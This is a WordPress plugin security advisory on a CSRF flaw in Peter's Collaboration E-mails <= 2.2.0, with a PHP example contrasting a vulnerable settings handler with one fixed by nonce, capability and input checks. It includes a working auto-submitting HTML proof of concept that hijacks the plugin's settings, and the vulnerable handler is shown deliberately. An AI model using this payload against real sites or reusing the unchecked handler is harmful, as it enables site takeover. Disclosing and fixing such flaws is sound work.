wpexploit - Daniel Ruf - WPEX-ID: 31B413E1-D4B5-463E-9910-37876881C062
Published: May 23, 2022 - 12:00 a.m.

Peter’s Collaboration E-mails <= 2.2.0 - Arbitrary Settings Update via CSRF


EPSS: 0.001 (Low), percentile 26.3%

The plugin saves its settings without verifying a nonce (no wp_nonce_field()/check_admin_referer() pair around the settings form), so the settings page is vulnerable to CSRF. An attacker who gets a logged-in administrator to open a crafted page can submit the settings form on their behalf and change any option the page exposes: lower the capability required to use the plugin (pce_required_capability), change the notification texts, change the sender address and name used for the e-mails, and alter which roles receive which notifications. The request itself needs no credentials beyond the victim's existing session cookie; the attacker only needs the victim to load the page while logged in.

Proof of concept: the following page, when loaded by a logged-in administrator, auto-submits a settings form that the plugin accepts as its own.

<!-- CSRF PoC: a cross-origin POST to the plugin's settings page, carrying no nonce.
     Field names match the plugin's settings form; inputs are hidden so the page
     shows nothing before the script submits it. -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
    <input type="hidden" name="pce_blogname" value="hacked">
    <!-- The address below was obfuscated by the page this PoC was taken from;
         an attacker would use an address they control. -->
    <input type="hidden" name="pce_fromaddress" value="[email protected]">
    <input type="hidden" name="pce_fromname" value="hacked">
    <input type="hidden" name="pce_whoapproved" value="1">
    <input type="hidden" name="pce_contributor_roles[]" value="contributor">
    <!-- Every role becomes a "moderator" and receives every notification. -->
    <input type="hidden" name="pce_moderator_roles[]" value="administrator">
    <input type="hidden" name="pce_moderator_roles[]" value="author">
    <input type="hidden" name="pce_moderator_roles[]" value="contributor">
    <input type="hidden" name="pce_moderator_roles[]" value="editor">
    <input type="hidden" name="pce_moderator_roles[]" value="subscriber">
    <input type="hidden" name="pce_emails_to_send[]" value="pending">
    <input type="hidden" name="pce_emails_to_send[]" value="approved">
    <input type="hidden" name="pce_emails_to_send[]" value="future">
    <input type="hidden" name="pce_emails_to_send[]" value="backtodraft">
    <input type="hidden" name="pce_emails_to_send[]" value="wentlive">
    <input type="hidden" name="pce_emails_to_send[]" value="private_to_published">
    <input type="hidden" name="pce_emails_to_send[]" value="edited">
    <!-- level_0 is the lowest legacy user level, i.e. every logged-in user. -->
    <input type="hidden" name="pce_required_capability" value="level_0">
    <!-- The submit button's name is what the handler keys on; "Aktualisieren"
         is the German "Update" label and its value does not matter. -->
    <input type="hidden" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
    // Submit as soon as the page loads; the browser attaches the victim's
    // WordPress session cookie to the cross-site POST.
    document.getElementById("test").submit();
</script>
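To show the pattern behind the advisory and how a plugin author closes it, here is an added illustration in plain WordPress PHP. It is not code from Peter's Collaboration E-mails or from the advisory author: the option names mirror the PoC's form fields, but the handler structure, the function names prefixed `pce_example_` and the nonce action name are assumptions. The first handler writes POSTed values straight to the options table, which is exactly what the PoC above exploits; the second one renders a nonce into the form and refuses any submission whose nonce does not verify, then also checks the caller's capability and validates the values.

```php
<?php
/*
 * Added example (not the plugin's own code). Shows a settings handler
 * without a nonce check beside the same handler with one.
 * Names prefixed pce_example_ and the nonce action are assumptions.
 */

/* Vulnerable: any page that gets the administrator's browser to POST to
 * options-general.php?page=peters_collaboration_emails.php updates the
 * options. Nothing ties the request to a form this site rendered. */
function pce_example_save_settings_vulnerable() {
    if ( ! isset( $_POST['pce_settingssubmit'] ) ) {
        return;
    }
    update_option( 'pce_fromaddress',         $_POST['pce_fromaddress'] );
    update_option( 'pce_fromname',            $_POST['pce_fromname'] );
    update_option( 'pce_moderator_roles',     $_POST['pce_moderator_roles'] );
    update_option( 'pce_required_capability', $_POST['pce_required_capability'] );
}

/* Fixed: the form carries a nonce bound to one action; the handler dies
 * unless that nonce verifies, then checks authority and sanitises input. */
const PCE_EXAMPLE_NONCE_ACTION = 'pce_example_save_settings'; // assumed name

function pce_example_render_form() {
    $action = admin_url( 'options-general.php?page=peters_collaboration_emails.php' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    // Emits _wpnonce (per user, per session, time-limited) and _wp_http_referer.
    wp_nonce_field( PCE_EXAMPLE_NONCE_ACTION );
    echo '<input type="email" name="pce_fromaddress" value="'
        . esc_attr( get_option( 'pce_fromaddress', '' ) ) . '">';
    echo '<input type="text" name="pce_fromname" value="'
        . esc_attr( get_option( 'pce_fromname', '' ) ) . '">';
    foreach ( wp_roles()->roles as $slug => $role ) {
        echo '<label><input type="checkbox" name="pce_moderator_roles[]" value="'
            . esc_attr( $slug ) . '"> ' . esc_html( $role['name'] ) . '</label>';
    }
    submit_button( __( 'Update' ), 'primary', 'pce_settingssubmit' );
    echo '</form>';
}

function pce_example_save_settings_fixed() {
    if ( ! isset( $_POST['pce_settingssubmit'] ) ) {
        return;
    }
    // A forged cross-site form cannot know the victim's nonce value, so the
    // PoC above dies here with "The link you followed has expired."
    check_admin_referer( PCE_EXAMPLE_NONCE_ACTION );

    // A nonce proves intent, not authority: a subscriber with a valid nonce
    // must still not be able to change site settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Sorry, you are not allowed to do that.' ), 403 );
    }

    // Sender address: must be a syntactically valid e-mail.
    $from = sanitize_email( wp_unslash( $_POST['pce_fromaddress'] ?? '' ) );
    if ( ! is_email( $from ) ) {
        wp_die( __( 'Invalid sender address.' ), 400 );
    }
    update_option( 'pce_fromaddress', $from );
    update_option( 'pce_fromname', sanitize_text_field( wp_unslash( $_POST['pce_fromname'] ?? '' ) ) );

    // Roles: keep only slugs that exist on this site.
    $posted = array_map( 'sanitize_key', (array) ( $_POST['pce_moderator_roles'] ?? array() ) );
    $roles  = array_values( array_intersect( $posted, array_keys( wp_roles()->roles ) ) );
    update_option( 'pce_moderator_roles', $roles );

    // Required capability: allow-list instead of storing whatever was posted,
    // so the option cannot be driven down to a legacy level like level_0.
    $allowed = array( 'edit_posts', 'publish_posts', 'edit_others_posts' ); // assumed list
    $cap     = sanitize_key( wp_unslash( $_POST['pce_required_capability'] ?? '' ) );
    if ( in_array( $cap, $allowed, true ) ) {
        update_option( 'pce_required_capability', $cap );
    }
}

add_action( 'admin_init', 'pce_example_save_settings_fixed' );
```

The nonce check alone is what stops the PoC, since a cross-site page cannot read the victim's `_wpnonce` value; the capability check and the input validation are the accompanying controls a reviewer would expect in the same handler, because a nonce only shows the request came from a form this site rendered, not that the user may change options.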

